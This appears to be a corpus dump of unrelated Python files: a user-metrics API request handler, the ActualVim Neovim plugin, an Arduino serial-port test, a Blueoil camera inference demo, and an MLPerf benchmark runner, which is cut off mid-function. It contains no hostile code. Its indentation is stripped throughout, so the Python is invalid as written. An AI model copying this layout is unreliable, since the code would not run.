err_msg = ''
if valid:
# process request
results = process_data_request(request_meta, users)
results = str(results)
response_size = getsizeof(results, None)
if response_size > MAX_BLOCK_SIZE:
index = 0
# Dump the data in pieces - block until it is picked up
while index < response_size:
p.put(results[index:index+MAX_BLOCK_SIZE], block=True)
index += MAX_BLOCK_SIZE
else:
p.put(results, block=True)
logging.info(log_name + ' - END JOB'
'\n\tCOHORT = {0} - METRIC = {1}'
' - PID = {2})'.
format(request_meta.cohort_expr, request_meta.metric, getpid()))
else:
p.put(err_msg, block=True)
logging.info(log_name + ' - END JOB - FAILED.'
'\n\tCOHORT = {0} - METRIC = {1}'
' - PID = {2})'.
format(request_meta.cohort_expr, request_meta.metric, getpid()))
# REQUEST FLOW HANDLER
# ###################
from dateutil.parser import parse as date_parse
from copy import deepcopy
from user_metrics.etl.data_loader import DataLoader
import user_metrics.metrics.user_metric as um
import user_metrics.etl.time_series_process_methods as tspm
from user_metrics.api.engine.request_meta import ParameterMapping
from user_metrics.api.engine.response_meta import format_response
from user_metrics.api.engine import DATETIME_STR_FORMAT
from user_metrics.api.engine.request_meta import get_agg_key, \
get_aggregator_type, request_types
INTERVALS_PER_THREAD = 10
MAX_THREADS = 5
USER_THREADS = settings.__user_thread_max__
REVISION_THREADS = settings.__rev_thread_max__
DEFAULT_INERVAL_LENGTH = 24
# create shorthand method refs
to_string = DataLoader().cast_elems_to_string
def process_data_request(request_meta, users):
"""
Main entry point of the module, prepares results for a given request.
Coordinates a request based on the following parameters::
metric_handle (string) - determines the type of metric object to
build. Keys metric_dict.
users (list) - list of user IDs.
**kwargs - Keyword arguments may contain a variety of variables.
Most notably, "aggregator" if the request requires aggregation,
"time_series" flag indicating a time series request. The
remaining kwargs specify metric object parameters.
"""
# Set interval length in hours if not present
if not request_meta.interval:
request_meta.interval = DEFAULT_INERVAL_LENGTH
else:
request_meta.interval = float(request_meta.interval)
# Get the aggregator key
agg_key = get_agg_key(request_meta.aggregator, request_meta.metric) if \
request_meta.aggregator else None
args = ParameterMapping.map(request_meta)
# Initialize the results
results, metric_class, metric_obj = format_response(request_meta)
start = metric_obj.datetime_start
end = metric_obj.datetime_end
if results['type'] == request_types.time_series:
# Get aggregator
try:
aggregator_func = get_aggregator_type(agg_key)
except MetricsAPIError as e:
results['data'] = 'Request failed. ' + e.message
return results
# Determine intervals and thread allocation
total_intervals = (date_parse(end) - date_parse(start)).\
total_seconds() / (3600 * request_meta.interval)
time_threads = max(1, int(total_intervals / INTERVALS_PER_THREAD))
time_threads = min(MAX_THREADS, time_threads)
logging.info(__name__ + ' :: Initiating time series for %(metric)s\n'
'\tAGGREGATOR = %(agg)s\n'
'\tFROM: %(start)s,\tTO: %(end)s.' %
{
'metric': metric_class.__name__,
'agg': request_meta.aggregator,
'start': str(start),
'end': str(end),
})
metric_threads = '"k_" : {0}, "kr_" : {1}'.format(USER_THREADS,
REVISION_THREADS)
metric_threads = '{' + metric_threads + '}'
new_kwargs = deepcopy(args)
del new_kwargs['interval']
del new_kwargs['aggregator']
del new_kwargs['datetime_start']
del new_kwargs['datetime_end']
out = tspm.build_time_series(start,
end,
request_meta.interval,
metric_class,
aggregator_func,
users,
kt_=time_threads,
metric_threads=metric_threads,
log=True,
**new_kwargs)
results['header'] = ['timestamp'] + \
getattr(aggregator_func,
um.METRIC_AGG_METHOD_HEAD)
for row in out:
timestamp = date_parse(row[0][:19]).strftime(
DATETIME_STR_FORMAT)
results['data'][timestamp] = row[3:]
elif results['type'] == request_types.aggregator:
# Get aggregator
try:
aggregator_func = get_aggregator_type(agg_key)
except MetricsAPIError as e:
results['data'] = 'Request failed. ' + e.message
return results
logging.info(__name__ + ' :: Initiating aggregator for %(metric)s\n'
'\AGGREGATOR = %(agg)s\n'
'\tFROM: %(start)s,\tTO: %(end)s.' %
{
'metric': metric_class.__name__,
'agg': request_meta.aggregator,
'start': str(start),
'end': str(end),
})
try:
metric_obj.process(users,
k_=USER_THREADS,
kr_=REVISION_THREADS,
log_=True,
**args)
except UserMetricError as e:
logging.error(__name__ + ' :: Metrics call failed: ' + str(e))
results['data'] = str(e)
return results
r = um.aggregator(aggregator_func, metric_obj, metric_obj.header())
results['header'] = to_string(r.header)
results['data'] = r.data[1:]
elif results['type'] == request_types.raw:
logging.info(__name__ + ':: Initiating raw request for %(metric)s\n'
'\tFROM: %(start)s,\tTO: %(end)s.' %
{
'metric': metric_class.__name__,
'start': str(start),
'end': str(end),
})
try:
metric_obj.process(users,
k_=USER_THREADS,
kr_=REVISION_THREADS,
log_=True,
**args)
except UserMetricError as e:
logging.error(__name__ + ' :: Metrics call failed: ' + str(e))
results['data'] = str(e)
return results
for m in metric_obj.__iter__():
results['data'][m[0]] = m[1:]
return results
# REQUEST NOTIFICATIONS
# #####################
from collections import OrderedDict
req_notification_queue_in = Queue()
req_notification_queue_out = Queue()
request_msg_type = namedtuple('RequestMessage', 'type hash url is_alive')
def requests_notification_callback(msg_queue_in, msg_queue_out):
"""
Asynchronous callback. Tracks status of requests and new requests.
This callback utilizes ``msg_queue_in`` & ``msg_queue_out`` to
manage request status.
"""
log_name = '{0} :: {1}'.format(__name__,
requests_notification_callback.__name__)
logging.debug('{0} - STARTING...'.format(log_name))
cache = OrderedDict()
while 1:
try:
msg = msg_queue_in.get(True)
except IOError as e:
logging.error(__name__ + ' :: Could not block '
'on in queue: "{0}"'.format(e.message))
sleep(1)
continue
try:
type = msg[0]
except (KeyError, ValueError):
logging.error(log_name + ' - No valid type ' \
'{0}'.format(str(msg)))
continue
# Init request
if type == 0:
try:
cache[msg[1]] = [True, msg[2]]
logging.debug(log_name + ' - Initialize Request: ' \
'{0}.'.format(str(msg)))
except Exception:
logging.error(log_name + ' - Initialize Request' \
' failed: {0}'.format(str(msg)))
# Kill request - leave on cache
elif type == 1:
try:
cache[msg[1]][0] = False
logging.debug(log_name + ' - Set request finished: ' \
'{0}.\n'.format(str(msg)))
except Exception:
logging.error(log_name + ' - Set request finished failed: ' \
'{0}\n'.format(str(msg)))
# Is the key in the cache and running?
elif type == 2:
try:
if msg[1] in cache:
msg_queue_out.put([cache[msg[1]][0]], True)
else:
msg_queue_out.put([False], True)
logging.debug(log_name + ' - Get request alive: ' \
'{0}.'.format(str(msg)))
except (KeyError, ValueError):
logging.error(log_name + ' - Get request alive failed: ' \
'{0}'.format(str(msg)))
# Get keys
elif type == 3:
msg_queue_out.put(cache.keys(), True)
# Get url
elif type == 4:
try:
if msg[1] in cache:
msg_queue_out.put([cache[msg[1]][1]], True)
else:
logging.error(log_name + ' - Get URL failed: {0}'.
format(str(msg)))
except (KeyError, ValueError):
logging.error(log_name + ' - Get URL failed: {0}'.format(str(msg)))
else:
logging.error(log_name + ' - Bad message: {0}'.format(str(msg)))
logging.debug('{0} - SHUTTING DOWN...'.format(log_name))
# Wrapper Methods for working with Request Notifications
# Use locks to enforce atomicity
BLOCK_TIMEOUT = 1
def req_cb_get_url(key, lock):
lock.acquire()
req_notification_queue_in.put([4, key], block=True)
try:
val = req_notification_queue_out.get(True, timeout=BLOCK_TIMEOUT)[0]
except Empty:
logging.error(__name__ + ' :: req_cb_get_url -'
' Block time expired.')
return ''
lock.release()
return val
def req_cb_get_cache_keys(lock):
lock.acquire()
req_notification_queue_in.put([3], block=True)
try:
val = req_notification_queue_out.get(block=True,
timeout=BLOCK_TIMEOUT)
except Empty:
logging.error(__name__ + ' :: req_cb_get_cache_keys -'
' Block time expired.')
return []
lock.release()
return val
def req_cb_get_is_running(key, lock):
lock.acquire()
req_notification_queue_in.put([2, key], True)
try:
val = req_notification_queue_out.get(block=True,
timeout=BLOCK_TIMEOUT)[0]
except Empty:
logging.error(__name__ + ' :: req_cb_get_is_running -'
' Block time expired.')
return False
lock.release()
return val
def req_cb_add_req(key, url, lock):
lock.acquire()
req_notification_queue_in.put([0, key, url])
lock.release() |
neo.py | import contextlib
import os
import queue
import sublime
import sys
import threading
import time
import traceback
from .lib import neovim
from .lib import util
from . import settings
from .screen import Screen
# os.environ['NVIM_LOG_FILE'] = '/Users/aegis/.nvimlog'
if not '_loaded' in globals():
NEOVIM_PATH = None
_loaded = False
_loading = False
INSERT_MODES = ['i', 'R']
VISUAL_MODES = ['V', 'v', '\x16']
MODES = {
'n': 'normal',
'c': 'command',
# ex mode goes and stays "not ready"
# think I need UI hook to support it for now
'i': 'insert',
'R': 'replace',
'v': 'visual',
'V': 'visual line',
'\x16': 'visual block',
# TODO: select, vreplace?
}
def plugin_loaded():
global NEOVIM_PATH
settings.load()
NEOVIM_PATH = sublime.load_settings('ActualVim.sublime-settings').get('neovim_path')
if not NEOVIM_PATH:
NEOVIM_PATH = util.which('nvim')
if sys.platform == 'win32':
if not NEOVIM_PATH:
candidates = [
r'C:\Program Files\Neovim',
r'C:\Program Files (x86)\Neovim',
r'C:\Neovim',
]
chocoroot = os.getenv('ChocolateyBinRoot')
if chocoroot: candidates.insert(0, os.path.join(chocoroot, r'\neovim\Neovim'))
else: candidates.insert(0, r'C:\tools\neovim\Neovim')
for c in candidates:
path = os.path.join(c, r'bin\nvim.exe')
if os.path.exists(path):
NEOVIM_PATH = path
break
elif os.path.isdir(NEOVIM_PATH):
for c in [r'bin\nvim.exe', 'nvim.exe']:
path = os.path.join(NEOVIM_PATH, c)
if os.path.exists(path):
NEOVIM_PATH = path
break
else:
NEOVIM_PATH = None
if not NEOVIM_PATH:
raise Exception('cannot find nvim executable')
print('ActualVim: using nvim binary path:', NEOVIM_PATH)
global vim, _loaded, _loading
try:
start = time.time()
vim = Vim()
_loading = True
vim._setup()
_loaded = True
_loading = False
from .view import neovim_loaded
neovim_loaded()
print('ActualVim: nvim started in {:.2f}ms'.format((time.time() - start) * 1000))
except Exception:
print('ActualVim: Error during nvim setup.')
traceback.print_exc()
_loaded = False
_loading = False
vim = None
del vim
def plugin_unloaded():
from .view import neovim_unloaded
neovim_unloaded()
global vim, _loaded
if _loaded:
vim.nv.command('qa!', async=True)
vim = None
_loaded = False
class Vim:
def __init__(self, nv=None):
self.nv = nv
self.ready = threading.Lock()
self.status_lock = threading.Lock()
self.status_last = {}
self.status_dirty = True
self.av = None
self.width = 80
self.height = 24
def _setup(self):
self.screen = Screen()
self.views = {}
args = settings.get('neovim_args') or []
if not isinstance(args, list):
print('ActualVim: ignoring non-list ({}) args: {}'.format(type(args), repr(args)))
args = []
self.nv = neovim.attach('child', argv=[NEOVIM_PATH, '--embed', '-n'] + args)
# toss in <FocusGained> in case there's a blocking prompt on startup (like vimrc errors)
self.nv.input('<FocusGained>')
messages = self.nv.eval('execute("messages")').strip()
if messages:
print('ActualVim: nvim startup error:')
print('-'*20)
print(messages)
print('-'*20)
sublime.active_window().run_command('show_panel', {'panel': 'console'})
self._sem = threading.Semaphore(0)
self._thread = t = threading.Thread(target=self._event_loop)
t.daemon = True
t.start()
self._sem.acquire()
# set up UI (before anything else so we can see errors)
options = {
'ext_popupmenu': True,
'ext_cmdline': True,
'rgb': True,
}
self.nv.ui_attach(self.width, self.height, options)
# hidden buffers allow us to multiplex them
self.nv.options['hidden'] = True
# folds aren't implemented
self.cmd('set nofoldenable')
rpc_id = self.nv.channel_id
# set up buffer read/write commands
cmd = 'autocmd {{}} * :call rpcrequest({}, "{{}}", expand("<abuf>"), expand("<afile>"))'.format(rpc_id)
# self.cmd(cmd.format('BufWritePre', 'write_pre'))
self.cmd(cmd.format('BufReadCmd', 'read'))
self.cmd(cmd.format('BufWriteCmd', 'write'))
self.cmd(cmd.format('BufEnter', 'enter'))
def funcdef(prototype, body):
self.eval(r'''execute(":function! {} \n {} \n endfunction")'''.format(prototype, body))
# set up autocomplete from Sublime via completefunc (ctrl-x, ctrl-u)
# controlled via bufopts['completefunc'] in ActualVim settings
complete = r'''return rpcrequest({}, \"complete\", bufnr(\"%\"), a:findstart, a:base)'''.format(rpc_id)
funcdef('ActualVimComplete(findstart, base)', complete)
# FIXME: these just hang for now
funcdef('ActualVimWinCmd(name, args)', r'call rpcnotify({}, \"wincmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
funcdef('ActualVimTextCmd(name, args)', r'call rpcnotify({}, \"textcmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
funcdef('ActualVimAppCmd(name, args)', r'call rpcnotify({}, \"appcmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
self.nvim_mode = False
try:
res = self.nv.request('nvim_get_mode')
if isinstance(res, dict):
self.nvim_mode = True
except neovim.api.NvimError:
pass
def _event_loop(self):
def on_notification(method, data):
# if vim exits, we might get a notification on the way out
if not (_loaded or _loading):
return
if method == 'redraw':
for cmd in data:
name, args = cmd[0], cmd[1:]
# TODO: allow subscribing to these
if name == 'bell' and self.av:
self.av.on_bell()
elif name in ('popupmenu_show', 'popupmenu_hide', 'popupmenu_select'):
self.av.on_popupmenu(name, args)
elif name in ('cmdline_show', 'cmdline_pos', 'cmdline_special_char', 'cmdline_hide',
'cmdline_block_show', 'cmdline_block_append', 'cmdline_block_hide'):
self.av.on_cmdline(name, args)
vim.screen.redraw(data)
if self.av:
self.av.on_redraw(data, vim.screen)
elif method == 'nvim_buf_lines_event':
buf, changedtick, start, end, lines, more = data
av = self.views.get(buf.number)
if av:
av.on_nvim_lines(changedtick, start, end, lines, more)
elif method == 'nvim_buf_changedtick_event':
buf, changedtick = data
av = self.views.get(buf.number)
if av:
av.on_nvim_changedtick(changedtick)
elif method == 'appcmd':
av = self.views.get(data[0])
if av:
av.on_appcmd(data[1], data[2])
elif method == 'wincmd':
av = self.views.get(data[0])
if av:
av.on_wincmd(data[1], data[2])
elif method == 'textcmd':
av = self.views.get(data[0])
if av:
av.on_textcmd(data[1], data[2])
def on_request(method, args):
# TODO: what if I need to handle requests that don't start with bufid?
bufid = int(args.pop(0))
av = self.views.get(bufid)
if not av:
# TODO: this spews on first "enter"
print('ActualVim: request "{}" failed: buf:{} has no view'.format(method, bufid))
return
if method == 'write':
# TODO: filename arg?
return av.on_write()
elif method == 'read':
# TODO: filename arg?
# TODO: pivot view?
pass
elif method == 'enter':
# TODO: focus view?
pass
elif method == 'complete':
return av.on_complete(args[0], args[1])
def on_setup():
self._sem.release()
self.nv.run_loop(on_request, on_notification, on_setup)
def cmd(self, *args, **kwargs):
return self.nv.command_output(*args, **kwargs)
def eval(self, *cmds, **kwargs):
if len(cmds) != 1:
cmd = '[' + (', '.join(cmds)) + ']'
else:
cmd = cmds[0]
return self.nv.eval(cmd, **kwargs)
def activate(self, av):
if self.av != av:
self.av = av
self.cmd('b! {:d}'.format(av.buf.number))
return True
return False
# buffer methods
def buf_new(self, view):
self.cmd('enew')
buf = max((b.number, b) for b in self.nv.buffers)[1]
buf.options['buftype'] = 'acwrite'
for k, v in settings.get('bufopts').items():
buf.options[k] = v
self.views[buf.number] = view
return buf
def buf_close(self, buf):
self.views.pop(buf.number, None)
self.cmd('bw! {:d}'.format(buf.number))
# neovim 'readiness' methods
# if you don't use check/force_ready and control your input/cmd interleaving, you'll hang all the time
def check_ready(self):
ready = self.ready.acquire(False)
if ready:
self.ready.release()
return ready
def force_ready(self):
for i in range(3):
if self.check_ready():
break
time.sleep(0.0001)
else:
self.nv.input('<c-\\><c-n>')
def press(self, key, onready=None):
self.status_dirty = True
mode_last = self.status_last.get('mode')
was_ready = self.ready.acquire(False)
try:
ret = self.nv.input(key)
except Exception:
return 0, False
if self.nvim_mode:
res = self.nv.request('nvim_get_mode') or {}
ready = not res.get('blocking', True)
else:
ready = False
def tmp():
# need to acquire/release so ready lock doesn't get stuck
self.ready.acquire(False)
self.ready.release()
onready()
self.status(cb=tmp)
if ready:
self.ready.release()
return ret, ready
def status(self, update=True, force=False, cb=None):
# TODO: use nvim_atomic? we need to get sel, buf, mode, everything at once if possible
with self.status_lock:
if self.status_dirty and update or force:
items = {
'mode': 'mode()',
'modified': '&modified',
'expandtab': '&expandtab',
'ts': '&ts',
'changedtick': 'getbufvar(bufnr("%"), "changedtick")',
'wrap': '&wrap',
'cline': 'line(".") - 1',
'ccol': 'col(".") - 1',
'vline': 'line("v") - 1',
'vcol': 'col("v") - 1',
'wview': 'winsaveview()',
'wwidth': 'winwidth(winnr())',
'wheight': 'winheight(winnr())',
'screenrow': 'screenrow()',
'screencol': 'screencol()',
}
expr = '[' + (', '.join(items.values())) + ']'
def update(*a):
self.status_last = dict(zip(items.keys(), a[-1]))
self.status_dirty = False
if cb:
# callbacks aren't decoded automatically
self.status_last['mode'] = self.status_last['mode'].decode('utf8')
cb()
if cb:
self.eval(expr, cb=update)
else:
update(self.eval(expr))
return self.status_last
def setpos(self, expr, line, col):
return self.eval('setpos("{}", [0, {:d}, {:d}])'.format(expr, line, col))
def select(self, a, b=None, mode='v'):
if b is None:
if self.mode in VISUAL_MODES:
self.nv.input('<c-\\><c-n>')
self.status_dirty = True
self.eval('cursor({:d}, {:d})'.format(a[0], a[1]))
else:
special = mode.startswith('<c-')
if self.mode in VISUAL_MODES:
self.nv.input('<c-\\><c-n>')
self.status_dirty = True
self.setpos('.', *a)
if special:
self.cmd('exe "normal! \\{}"'.format(mode))
else:
self.cmd('normal! {}'.format(mode))
self.setpos('.', *b)
def resize(self, width, height):
w, h = int(width), int(height)
if w and h and (w != self.width or h != self.height) and self.check_ready():
self.width, self.height = w, h
self.nv.ui_try_resize(w, h)
@property
def mode(self):
return self.status()['mode']
@property
def status_line(self):
return self.screen[-1].strip()
|
serialcommunication.py | __author__ = 'OSAMA'
# This file tests serial communication with Arduino UNO
# when sending a message of data very quickly; Also,
# examine the initialization flag.
# Imports
import serial
import time
import threading
import socket
def main():
# All the main code resides here.
def read():
try:
while True:
if s.inWaiting() > 0:
print s.readline().strip('\n\r')
except KeyboardInterrupt:
s.close()
comport = "COM5"
baudrate = 115200
# timeout = 0.1
# writetimeout = 0.1
s = serial.Serial(comport,baudrate)
readthread = threading.Thread(target=read)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
sock.bind(("127.0.0.2",5000))
while not s.isOpen():
s.open()
else:
print "Serial Port is open"
time.sleep(2)
message = "*255,0,-255,0,1$"
readthread.start()
try:
while True:
r = sock.recvfrom(1024)
s.write(message)
# print "sent:", message
except KeyboardInterrupt:
s.close()
if __name__ == "__main__":
main() |
usb_camera_demo.py | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import time
import os
import sys
from multiprocessing import Process, Queue
from time import sleep
from collections import deque
import click
import cv2
import numpy as np
from blueoil.common import get_color_map
from lmnet.nnlib import NNLib
from config import (
load_yaml,
build_pre_process,
build_post_process,
)
from lmnet.utils.demo import (
add_rectangle,
add_fps,
run_inference,
)
from blueoil.visualize import (
label_to_color_image,
visualize_keypoint_detection,
)
from blueoil.pre_processor import resize
nn = None
pre_process = None
post_process = None
def init_camera(camera_width, camera_height):
if hasattr(cv2, 'cv'):
vc = cv2.VideoCapture(0)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, camera_width)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, camera_height)
vc.set(cv2.cv.CV_CAP_PROP_FPS, 60)
else:
vc = cv2.VideoCapture(0)
vc.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
vc.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
vc.set(cv2.CAP_PROP_FPS, 60)
return vc
def add_class_label(canvas,
text="Hello",
font=cv2.FONT_HERSHEY_SIMPLEX,
font_scale=0.42,
font_color=(140, 40, 200),
line_type=1,
dl_corner=(50, 50)):
cv2.putText(canvas, text, dl_corner, font, font_scale, font_color, line_type)
def infer_loop(q_input, q_output):
global nn, pre_process, post_process
nn.init()
while True:
img_orig, fps = q_input.get()
img = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
result, _, _ = run_inference(img, nn, pre_process, post_process)
q_output.put((result, fps, img_orig))
def show_object_detection(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
input_width = config.IMAGE_SIZE[1]
input_height = config.IMAGE_SIZE[0]
window_img = add_rectangle(
config.CLASSES,
window_img,
result,
(input_height, input_width),
)
img = add_fps(window_img, fps)
window_name = "Object Detection Demo"
cv2.imshow(window_name, window_img)
def show_classification(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
result_class = np.argmax(result, axis=1)
add_class_label(window_img, text=str(result[0, result_class][0]), font_scale=0.52, dl_corner=(230, 230))
add_class_label(window_img, text=config.CLASSES[result_class[0]], font_scale=0.52, dl_corner=(230, 210))
window_img = add_fps(window_img, fps)
window_name = "Classification Demo"
cv2.imshow(window_name, window_img)
def show_semantic_segmentation(img, result, fps, window_height, window_width, config):
orig_img = resize(img, size=[window_height, window_width])
colormap = np.array(get_color_map(len(config.CLASSES)), dtype=np.uint8)
seg_img = label_to_color_image(result, colormap)
seg_img = cv2.resize(seg_img, dsize=(window_width, window_height))
window_img = cv2.addWeighted(orig_img, 1, seg_img, 0.8, 0)
window_img = add_fps(window_img, fps)
window_name = "Semantic Segmentation Demo"
cv2.imshow(window_name, window_img)
def show_keypoint_detection(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
input_width = config.IMAGE_SIZE[1]
input_height = config.IMAGE_SIZE[0]
window_img = visualize_keypoint_detection(window_img, result[0], (input_height, input_width))
window_img = add_fps(window_img, fps)
window_name = "Keypoint Detection Demo"
cv2.imshow(window_name, window_img)
def capture_loop(q_input):
camera_width = 320
camera_height = 240
vc = init_camera(camera_width, camera_height)
count_frames = 10
prev_1 = time.perf_counter()
prev = deque([prev_1] * count_frames)
while True:
valid, img = vc.read()
if valid:
now = time.perf_counter()
prev.append(now)
old = prev.popleft()
fps = count_frames / (now - old)
q_input.put((img, fps))
def run_impl(config):
# Set variables
q_input = Queue(2)
q_output = Queue(4)
p_capture = Process(target=capture_loop, args=(q_input,))
p_capture.start()
p_infer = Process(target=infer_loop, args=(q_input, q_output))
p_infer.start()
window_width = 320
window_height = 240
show_handles_table = {
"IMAGE.OBJECT_DETECTION": show_object_detection,
"IMAGE.CLASSIFICATION": show_classification,
"IMAGE.SEMANTIC_SEGMENTATION": show_semantic_segmentation,
"IMAGE.KEYPOINT_DETECTION": show_keypoint_detection
}
show_handle = show_handles_table[config.TASK]
# ----------- Beginning of Main Loop ---------------
while True:
if not q_output.empty():
result, fps, img = q_output.get()
show_handle(img, result, fps, window_height, window_width, config)
key = cv2.waitKey(1) # Wait for 1ms
if key == 27: # ESC to quit
sleep(1.0) # Wait for worker's current task is finished
p_capture.terminate()
p_infer.terminate()
return
# --------------------- End of main Loop -----------------------
def run(model, config_file):
global nn, pre_process, post_process
filename, file_extension = os.path.splitext(model)
supported_files = ['.so', '.pb']
if file_extension not in supported_files:
raise Exception("""
Unknown file type. Got %s%s.
Please check the model file (-m).
Only .pb (protocol buffer) or .so (shared object) file is supported.
""" % (filename, file_extension))
config = load_yaml(config_file)
pre_process = build_pre_process(config.PRE_PROCESSOR)
post_process = build_post_process(config.POST_PROCESSOR)
if file_extension == '.so': # Shared library
nn = NNLib()
nn.load(model)
elif file_extension == '.pb': # Protocol Buffer file
# only load tensorflow if user wants to use GPU
from lmnet.tensorflow_graph_runner import TensorflowGraphRunner
nn = TensorflowGraphRunner(model)
run_impl(config)
@click.command(context_settings=dict(help_option_names=['-h', '--help']))
@click.option(
"-m",
"-l",
"--model",
type=click.Path(exists=True),
help=u"""
Inference Model filename
(-l is deprecated please use -m instead)
""",
default="../models/lib/libdlk_fpga.so",
)
@click.option(
"-c",
"--config_file",
type=click.Path(exists=True),
help=u"Config file Path",
default="../models/meta.yaml",
)
def main(model, config_file):
_check_deprecated_arguments()
run(model, config_file)
def _check_deprecated_arguments():
argument_list = sys.argv
if '-l' in argument_list:
print("Deprecated warning: -l is deprecated please use -m instead")
if __name__ == "__main__":
main()
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.post_process_offset1,
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.post_process_argmax_offset,
{"image_size": [224, 224, 3]}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
DEFAULT_LATENCY_BUCKETS = "0.010,0.050,0.100,0.200,0.400"
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"time": 128,
"max-latency": DEFAULT_LATENCY_BUCKETS,
},
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
},
"mobilenet-onnx": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
},
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
}
}
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--output", help="test results")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=str, help="max latency in 99pct tile")
parser.add_argument("--cache", type=int, default=0, help="use cache")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.max_latency:
args.max_latency = [float(i) for i in args.max_latency.split(",")]
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, img, label=None):
self.id = query_id
self.img = img
self.label = label
self.start = time.time()
class Runner:
def __init__(self, model, ds, threads, post_process=None):
self.tasks = Queue(maxsize=threads * 5)
self.workers = []
self.model = model
self.post_process = post_process
self.threads = threads
self.result_list = []
self.result_dict = {}
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
try:
# run the prediction
results = self.model.predict({self.model.inputs[0]: qitem.img})
# and keep track of how long it took
took = time.time() - qitem.start
response = []
for idx, result in enumerate(results[0]):
result = self.post_process(result)
if qitem.label[idx] == result:
self.result_dict["good"] += 1
self.result_dict["total"] += 1
# FIXME: unclear what to return here
response.append(lg.QuerySampleResponse(qitem.id[idx], 0, 0))
self.result_list.append(took)
lg.QuerySamplesComplete(response)
except Exception as ex: # pylint: disable=broad-except
log.error("execute_parallel thread: %s", ex)
tasks_queue.task_done()
def start_pool(self):
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def start_run(self, result_list, result_dict):
self.result_list = result_list
self.result_dict = result_dict
def enqueue(self, id, data, label):
item = Item(id, data, label)
self.tasks.put(item)
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
# this is what we record for each run
result = {
"mean": np.mean(result_list),
"took": took,
"qps": len(result_list) / took,
"count": len(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"good_items": result_dict["good"],
"total_items": result_dict["total"],
"accuracy": 100. * result_dict["good"] / result_dict["total"],
}
# add the result to the result dict
final_results[name] = result
# to stdout
